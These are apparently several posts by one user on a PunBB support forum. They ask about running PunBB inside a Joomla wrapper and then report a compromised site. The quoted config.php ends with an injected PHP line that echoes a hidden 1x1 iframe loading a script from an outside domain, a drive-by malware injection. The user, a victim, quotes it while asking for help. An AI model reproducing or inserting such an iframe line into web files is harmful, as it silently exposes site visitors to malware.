I don't want any integration. I just only need a mean to make punbb work inside the joomla wrapper. The previous version worked like a charm so I'm asking myself why this version doesn't work.

Thanks for any help

I would like to integrate a PunBB form into joomla 1.5 simply using wrapper. Problem is that the iframe doesn't get sized right and I get only a little iframe about 150 pixels height with the scroll bars. If I try to wrap any other file it works well so I think maybe it's something inside the punbb core that prevent from the right iframe dimensioning.

I remember that some time ago with PBB 1.1 or 1.2 this worked right.

Any suggestion?

thanks

3

(7 replies, posted in PunBB 1.2 troubleshooting)

I've noticed that all the files in the cache folder has the iframe trojan. Problem is that these files are recreated from withinn punbb I think so how can I avoid this?

tanks

4

(7 replies, posted in PunBB 1.2 troubleshooting)

I don't know before, but now is set to 444

5

(7 replies, posted in PunBB 1.2 troubleshooting)

I've deleted the iframe and now the forum works but my question is. How they do that? And what is the right content of config.php?

6

(7 replies, posted in PunBB 1.2 troubleshooting)

Today my forum is completely blank. A blank page appear if you try to access it.

Reading your forum I've checked the file config.php and this is the content (some data are masked)

<?php

$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'xxxxxx';
$db_username = 'xxxxxx';
$db_password = 'xxxxxx';
$db_prefix = 'pun_';
$p_connect = false;

$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bceb1676';

define('PUN', 1);<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

What I've to do? What happened? I'm running the latest version of punbb...